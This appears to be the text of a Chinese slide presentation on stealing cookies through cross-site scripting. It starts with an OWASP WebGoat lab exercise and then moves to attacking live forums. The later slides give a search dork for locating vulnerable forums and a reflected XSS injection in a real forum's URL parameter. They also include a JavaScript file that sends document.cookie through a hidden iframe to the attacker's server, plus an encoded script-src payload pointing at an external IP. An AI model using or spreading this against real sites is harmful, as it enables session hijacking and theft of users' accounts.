XSS偷窃Cookie预案.ppt

XSS偷窃Cookie报告 大纲 OWASP WEBGOAT 上的样例 网上实例攻击论坛 OWASP WEBGOAT 上的样例 OWASP WEBGOAT 上的样例 OWASP WEBGOAT 上的样例 点Submit 之后会有一条留言 OWASP WEBGOAT 上的样例 当我们点击“1”的留言后我们可以看到我们刚才输入的内容 OWASP WEBGOAT 上的样例 我们输入一条JavaScript语句看一下是否有这个漏洞。。。接着点提交 OWASP WEBGOAT 上的样例 当我们提交后会多出一条留言“2” ，我们点击它 OWASP WEBGOAT 上的样例 会出现”ha ha ha” 刚才的脚本语句，说明这个留言系统有这个XSS漏洞 OWASP WEBGOAT 上的样例 我们第三条留言 加入一段JavaScript 要求在本机打印出本机的cookies 的信息 二、 OWASP WEBGOAT 上的样例 点击就可以打印本机关于这个网站的cookies信息，我们可以得到这个SessionId OWASP WEBGOAT 上的样例 我们就在想在本机拿到 cookies 有什么意义？ 其实我们不仅可以拿到cookies 有的时候还可拿用户名和相应的密码，并且还可以把它发送出去！！！ 下面我们做的实例！ 网上实例攻击论坛 1.早期的论坛，有些论坛会用允许用户在留言的时候使用HTML代码 2.这一类漏洞有一个比较好找的关键字，就是在网页链接中会包含有forum_title 3.在百度搜索栏填入 Inurl: forum_title 网上实例攻击论坛 网上实例攻击论坛 1.我们会发现有很多这类的论坛。选择其中一个 叫的论坛 2.论坛地址： /DEFAULT.ASP 网上实例攻击论坛 /topic.asp?topic_id=225forum_id=53cat_id=16forum_title=%C7%C5%C1%BA%BC%BC%CA%F5%BD%BB%C1%F7%C2%DB%CC%B3topic_title=%C9%EE%DB%DA%CB%B9%BD%A1%C9%AD%BD%A8%D6%FE%BC%BC%CA%F5%D3%D0%CF%DE%B9%BE 百度中搜索的结果的链接: 网上实例攻击论坛 1.把 forum_title= 后面的内容去掉 改成 /topic.asp?topic_id=225forum_id=53cat_id=16forum_title=scriptalert(adsfad)/script 2.转码后： /forum.asp?forum_id=53cat_id=16forum_title=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%61%64%73%66%61%64%22%29%3C%2F%73%63%72%69%70%74%0D%0A 网上实例攻击论坛 网上实例攻击论坛 OK 测试 此论坛 有可能 可以利用 XSS偷窃Cookie 进入 下一步 搭建自己的服务器 网上实例攻击论坛 1.服务器 我们选择PHPnow 1.45 绿色版。 2.搭起过程很简单，就不详细介绍了。 网上实例攻击论坛 网上实例攻击论坛 编辑a.js var code; var target = http:// 本机服务器的外网/?; info=escape(document.cookie); target=target+info; code=iframe style=display:none; src=; code=code+target; code=code+ width=0 height=0/iframe; document.write(code); 网上实例攻击论坛 上传a.js 到服务器的htdocs文件夹下，测试： 可以下载。 网上实例攻击论坛 script src=http://“本机服务器的外网IP” /a.js/script 转码 ： %3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%31%33%2E%32%34%36%2E%39%2E%32%34%38%2F%61%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E 网上实例攻击论坛 1.找到前面baidu找到的链接 2.把forum_title = 后面的内容改成我们转码形成的东西 在浏览器里直接输入： /topic.asp?topic_id=1049forum_id=53cat_id=16topic_title=testforum